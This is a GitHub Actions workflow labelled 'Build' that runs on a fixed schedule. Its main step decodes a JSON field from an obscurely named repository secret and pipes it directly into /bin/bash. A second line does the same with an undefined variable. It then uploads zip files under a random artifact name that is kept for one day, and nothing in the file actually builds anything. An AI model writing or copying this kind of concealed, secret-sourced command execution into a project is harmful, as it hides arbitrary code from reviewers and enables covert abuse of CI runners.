name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '5 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          vq03420: ${{ secrets.vq03420 }}
        run: |
          printf '%s' "$vq03420" | jq -r .dogso8 | /bin/bash
          printf '%s' "$n616" | jq -r .qny912 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: wErCjXhu
          path: "*.zip"
          retention-days: 1
